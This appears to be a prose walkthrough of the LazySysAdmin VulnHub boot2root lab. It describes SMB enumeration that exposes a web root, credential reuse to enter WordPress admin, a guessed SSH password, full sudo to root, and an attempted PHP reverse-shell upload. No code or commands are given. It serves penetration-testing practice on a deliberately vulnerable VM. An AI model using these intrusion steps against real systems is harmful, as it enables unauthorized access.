Today we are working on LazySysAdmin from Vulnhub.com. This boot2root VM is rated Beginner/Intermediate.
Initial Enumeration
After getting the VM set up in VMWare Player we start with our nmap scans.
HTTP Enumeration
The homepage is pretty basic with not much to work from. The http-enum script that we ran in nmap gives us some things to check, however nothing jumps out at me at being particularly interesting as an attack vector. I tried a wp-scan on the Wordpress folder.
Other than detecting a user of “admin” it didn’t find anything useful. Let’s move on.
SMB Enumeration
nmap also told us that SMB is active on the box. We get plenty of interesting stuff in the share$ folder. This looks like the webserver root folder.
Since these folders are accessible from the web server, I attemped to upload my php reverse shell from pentestmonkey in the hopes of getting a quick shell. None of the folders appear to be writeable.
I downloaded all the files to my attacker box to look through them.
One of the files in the root folder gives us a possible password.
MySQL
In the /wordpress folder I checked wp-config.php to get MySQL database information.
I tried to remotely connect to the database with the mysql client (remember tcp/3306 is open) but no luck.
IRC
From our scans this box has an IRC server. I installed hexchat and connected to the box, but nothing jumped out at me as being useful.
Wordpress
I went back to the Wordpress site to see if I could log on with any of the information we found. http://<ip address>/wordpress/wp-login.php is the default login page. Knowing that our admin is lazy and may resuse creds, I tried user ‘admin’ and password ‘TogieMYSQL12345^^’ that we found from our SMB enumeration and logged into the Wordpress admin page.
I googled exploits for the available plugins since they are so often vulnerable, but didn’t find anything interesting. The admin page always has a quote mentioning “Dolly” so I tried ssh with that user and some of the passwords we’ve discovered, but didn’t have any luck. I then checked out the admin’s profile page.
We have seen “Togie” before in another password, so maybe our admin uses that for ssh.
After a couple tries, I found that password “12345” works! Our sysadmin really is lazy. That couldn’t also be the password for his sudo priviliges, could it?
After we find that togie has “All” sudo privilges, getting the root flag is trivial.
Thanks for reading!
